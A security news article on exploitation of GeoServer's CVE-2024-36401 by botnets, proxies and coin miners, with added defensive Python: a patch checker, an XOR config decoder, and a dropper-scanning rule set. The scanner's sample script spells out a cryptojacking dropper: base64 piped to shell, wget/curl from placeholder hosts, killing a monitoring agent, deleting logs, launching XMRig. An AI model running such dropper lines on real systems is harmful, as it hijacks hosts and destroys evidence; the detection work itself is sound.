GeoServer versions prior to 2.23.6, 2.24.4, and 2.25.2 are susceptible to remote code execution; attackers can exploit this critical vulnerability to gain unauthorized access to, and control of, vulnerable systems.
The flaw, tracked as CVE-2024-36401, allows unauthenticated attackers to execute arbitrary code remotely by abusing unsafe XPath evaluation of OGC request parameters. It has been resolved in the latest versions (2.23.6, 2.24.4, and 2.25.2).
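Because the fix landed on three maintenance branches at once, "am I patched?" is a per-branch question rather than a single version comparison. The following Python helper is an added example (not from Fortinet or the GeoServer project) that maps a version string to "affected / not affected" using only the fixed releases named above; it assumes that every release before 2.23.6 is affected, that branches newer than 2.25 shipped after the fix, and that pre-release builds (SNAPSHOT, RC) should be treated conservatively as unpatched.

```python
import re
from typing import Dict, Tuple

# Branch -> first release on that branch carrying the fix, taken from the
# advisory text above (2.23.6, 2.24.4, 2.25.2).
FIXED_PATCH_BY_BRANCH = {(2, 23): 6, (2, 24): 4, (2, 25): 2}
OLDEST_FIXED_BRANCH = (2, 23)

# major.minor.patch with an optional "-QUALIFIER" such as -SNAPSHOT or -RC1.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z]+))?")


def parse_version(text: str) -> Tuple[int, int, int, str]:
    """Pull major, minor, patch and qualifier out of strings such as '2.25.1'
    or 'GeoServer 2.24.4-SNAPSHOT'. Raises ValueError if no x.y.z is present."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    major, minor, patch, qualifier = m.groups()
    return int(major), int(minor), int(patch), (qualifier or "")


def is_vulnerable_to_cve_2024_36401(text: str) -> bool:
    """True when the version string denotes a release that still lacks the fix."""
    major, minor, patch, qualifier = parse_version(text)
    branch = (major, minor)
    if qualifier:
        # Assumption: a SNAPSHOT/RC build may predate the fix commit on its
        # branch, so treat it as unpatched until proven otherwise.
        return True
    if branch < OLDEST_FIXED_BRANCH:
        return True  # every release before 2.23.6 is affected
    if branch in FIXED_PATCH_BY_BRANCH:
        return patch < FIXED_PATCH_BY_BRANCH[branch]
    return False  # assumption: 2.26 and later were cut after the fix


def triage(inventory: Dict[str, str]) -> Dict[str, bool]:
    """Map host label -> version string to host label -> needs_patch."""
    return {host: is_vulnerable_to_cve_2024_36401(v) for host, v in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory; host names and versions are illustrative only.
    sample = {
        "gis-prod-01": "GeoServer 2.25.1 (build 1234)",
        "gis-prod-02": "2.25.2",
        "gis-legacy": "2.22.5",
        "gis-dev": "2.24.4-SNAPSHOT",
    }
    for host, needs_patch in triage(sample).items():
        print(f"{host:12} {'PATCH NOW' if needs_patch else 'ok'}")
```

The version string is usually visible in the GeoServer web admin "About" page or the `/geoserver/rest/about/version` endpoint on servers you administer; feeding those strings to `triage` gives a quick fleet-wide patch list.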
On July 15, this critical vulnerability in OSGeo GeoServer's GeoTools component was observed being exploited to spread malware. Botnets and miner groups quickly targeted the flaw, while the GOREVERSE operators attempted to establish a command-and-control connection to execute malicious actions.
An attacker exploits CVE-2024-36401 to deploy GOREVERSE, a malicious reverse proxy server, on compromised systems. GOREVERSE connects to a non-standard port on a predefined attacker-controlled server.
SideWalk malware fetches a script from a remote server and uses XOR decryption to decode a next-stage payload and configuration data. The configuration data contains C2 information and is decrypted using the ChaCha20 algorithm with a hardcoded key.
It establishes a C2 connection secured with ChaCha20 encryption and downloads a customized configuration file for Fast Reverse Proxy (FRP), a legitimate tunnelling tool that the attackers abuse to obfuscate malicious network traffic.
FRP creates an encrypted tunnel to a remote server, allowing the attackers to maintain persistent control over the compromised system. The malware’s geographical targeting suggests a wide-scale attack campaign targeting vulnerabilities prevalent in South America, Europe, and Asia.
The JenX Mirai variant downloads a malicious file from a specified URL, extracts its configuration data using XOR decryption, and attempts to connect to a C2 server. It also contains a hard-coded payload targeting the Huawei router vulnerability CVE-2017-17215, which attempts to download additional malware.
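Both SideWalk and the JenX Mirai variant described above hide their configuration behind simple XOR encoding before a C2 address is ever visible. The block below is an added analyst-side example, not code from Fortinet or from either malware family: it brute-forces a single-byte XOR key against a blob, accepts a key only when the output contains an expected substring (a "crib" such as `http`) and is mostly printable text, and then pulls URL and ip:port indicators out of the decoded text. The sample blob is constructed here from a fake JSON config using the TEST-NET-3 address range and key 0xA7; it is not taken from any real sample.

```python
import re
from typing import List, Optional, Tuple

# Bytes an analyst expects in a decoded text/JSON config: printable ASCII plus whitespace.
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. XOR is its own inverse, so the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def text_ratio(data: bytes) -> float:
    """Fraction of bytes that look like text; 1.0 means every byte is printable or whitespace."""
    return sum(b in TEXT_BYTES for b in data) / len(data) if data else 0.0


def recover_single_byte_key(blob: bytes, crib: bytes, min_ratio: float = 0.95) -> Optional[int]:
    """Try all 256 single-byte keys. A candidate wins only if the decoded output
    contains the crib AND is mostly text; the highest text ratio wins ties.
    Returns the key byte, or None when no key satisfies both conditions."""
    best_ratio, best_key = 0.0, None
    for key in range(256):
        out = xor_bytes(blob, bytes([key]))
        if crib not in out:
            continue
        ratio = text_ratio(out)
        if ratio >= min_ratio and ratio > best_ratio:
            best_ratio, best_key = ratio, key
    return best_key


def extract_network_indicators(text: str) -> List[str]:
    """Pull URL and ip:port tokens out of decoded config text for blocklists and hunting."""
    pattern = r"https?://[^\s\"'<>]+|\b(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}\b"
    return re.findall(pattern, text)


def decode_config(blob: bytes, crib: bytes = b"http") -> Optional[Tuple[int, str, List[str]]]:
    """Return (key, decoded_text, indicators), or None if no single-byte key decodes the blob."""
    key = recover_single_byte_key(blob, crib)
    if key is None:
        return None
    text = xor_bytes(blob, bytes([key])).decode("ascii", errors="replace")
    return key, text, extract_network_indicators(text)


# Constructed sample: a fake JSON config (TEST-NET-3 addresses) XORed with 0xA7.
# Nothing here is taken from the real SideWalk or JenX samples.
CONFIG_PLAINTEXT = b'{"c2":"203.0.113.10:4444","stage2":"http://203.0.113.10/s2.bin"}'
SAMPLE_BLOB = xor_bytes(CONFIG_PLAINTEXT, b"\xa7")

if __name__ == "__main__":
    result = decode_config(SAMPLE_BLOB)
    if result is None:
        print("no single-byte XOR key recovered")
    else:
        key, text, iocs = result
        print(f"key=0x{key:02x}\n{text}\nindicators={iocs}")
```

The crib matters: printable-ratio alone is not enough, because several keys close to the real one (for example, one that only flips letter case) also yield mostly printable output, so requiring a known substring such as `http` or a JSON brace pattern is what makes the recovery unambiguous. The ChaCha20 layer that SideWalk adds on top cannot be brute-forced this way; for that, the hardcoded key must be lifted from the binary.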
The Condi botnet is delivered by a downloader script that uses wget to fetch binaries built for various CPU architectures and executes them; the bot then connects to a C2 server for commands and launches DDoS attacks.
The botnet employs different attack methods, including TCP, UDP, and VSE flooding. Additionally, it contains backdoor functionalities to execute remote commands and gather host information.
A malicious script downloaded from a remote URL gathers system info, uninstalls cloud platform monitoring agents, disables security processes, and then deploys a coin miner targeting specific mining pools.
An attacker initiates a coin miner attack by downloading a Base64-encoded script from a malicious website, then downloads a coin miner named “linuxsys” and a configuration file named “config(.)json” from an AWS S3 bucket controlled by the attacker.
According to Fortinet, the configuration file sets the pool URL “pool(.)supportxmr(.)com:80” with credentials, and the miner itself is XMRig.
Another detected remote script download attempt, likely tied to a coin miner, fetches a file from a suspicious server, grants it execution permission, and removes files from system directories.
The “check.sh” script prepares the victim’s system for cryptojacking by creating directories and verifying whether the host is already infected. If it is not, the script downloads a configuration script (“config.sh”) and the XMRig miner, likely from the attacker’s IP address and GitHub, respectively.
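The coin-miner droppers summarized above share a recognizable shape: a staged download (often from a raw IP or an attacker-controlled S3 bucket), a Base64 blob piped into a shell, a `chmod` to make the payload executable, termination of monitoring or security processes, deletion from system directories, and finally a miner pointed at a known pool. The following Python scanner is an added example (not Fortinet's code) that runs a small set of heuristic rules over a shell script and returns a verdict. The rule set and the sample script are constructed for this example; the only indicator taken from the report is the `supportxmr.com` pool domain together with the `linuxsys` and `xmrig` binary names, and the IP address, bucket name, and process name in the sample are placeholders.

```python
import re
from typing import List, Tuple

Hit = Tuple[int, str, str]  # (line number, rule name, offending line)

# Heuristic rules modelled on the dropper behaviour described in the report.
# Constructed for this example; tune before using on real scripts.
RULES = [
    ("base64_to_shell", re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash)\b")),
    ("download_tool",   re.compile(r"\b(?:wget|curl)\b.*\bhttps?://")),
    ("s3_download",     re.compile(r"\.s3\.amazonaws\.com/")),
    ("chmod_exec",      re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")),
    ("kill_process",    re.compile(r"\b(?:pkill|killall|kill\s+-9)\b")),
    ("rm_system_dir",   re.compile(r"\brm\s+-\w*r\w*\s+/(?:etc|var|usr|bin|lib|root)\b")),
    ("known_miner",     re.compile(r"supportxmr\.com|\bxmrig\b|\blinuxsys\b", re.IGNORECASE)),
]


def scan_script(script: str) -> List[Hit]:
    """Run every rule over every line; one hit per (line, rule) pair."""
    hits: List[Hit] = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def verdict(hits: List[Hit]) -> str:
    """Collapse hits into a triage label. A known miner/pool name combined with
    any staging behaviour is the strongest signal; three distinct behaviours
    without a miner name is still worth a look."""
    names = {name for _, name, _ in hits}
    staging = {"download_tool", "s3_download", "chmod_exec", "base64_to_shell"}
    if "known_miner" in names and names & staging:
        return "likely cryptojacking dropper"
    if len(names) >= 3:
        return "suspicious dropper behaviour"
    return "no strong indicators"


# Constructed sample dropper; IP, bucket name, and process name are placeholders.
SAMPLE_SCRIPT = """#!/bin/sh
mkdir -p /tmp/.x && cd /tmp/.x
echo ZWNobyBoaQ== | base64 -d | sh
wget -q http://203.0.113.25/linuxsys -O /tmp/.x/linuxsys
curl -s https://attacker-bucket-placeholder.s3.amazonaws.com/config.json -o /tmp/.x/config.json
chmod +x /tmp/.x/linuxsys
pkill -f monitor-agent
rm -rf /var/log/secure
nohup /tmp/.x/linuxsys -o pool.supportxmr.com:80 -u WALLET_PLACEHOLDER >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    found = scan_script(SAMPLE_SCRIPT)
    for lineno, name, line in found:
        print(f"line {lineno:2} [{name}] {line}")
    print("verdict:", verdict(found))
```

Run against scripts recovered from `/tmp`, cron entries, or the `wget`/`curl` command lines captured in process-audit logs; the per-line hits tell an analyst which stage of the chain a host reached, which is more useful during response than the verdict alone.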
GeoServer’s open-source nature exposes it to vulnerabilities. While the patch addresses this specific vulnerability, comprehensive cybersecurity measures, including regular updates, threat detection, and strict access controls, remain essential to protect GeoServer environments from potential threats and to ensure the security of the data infrastructure.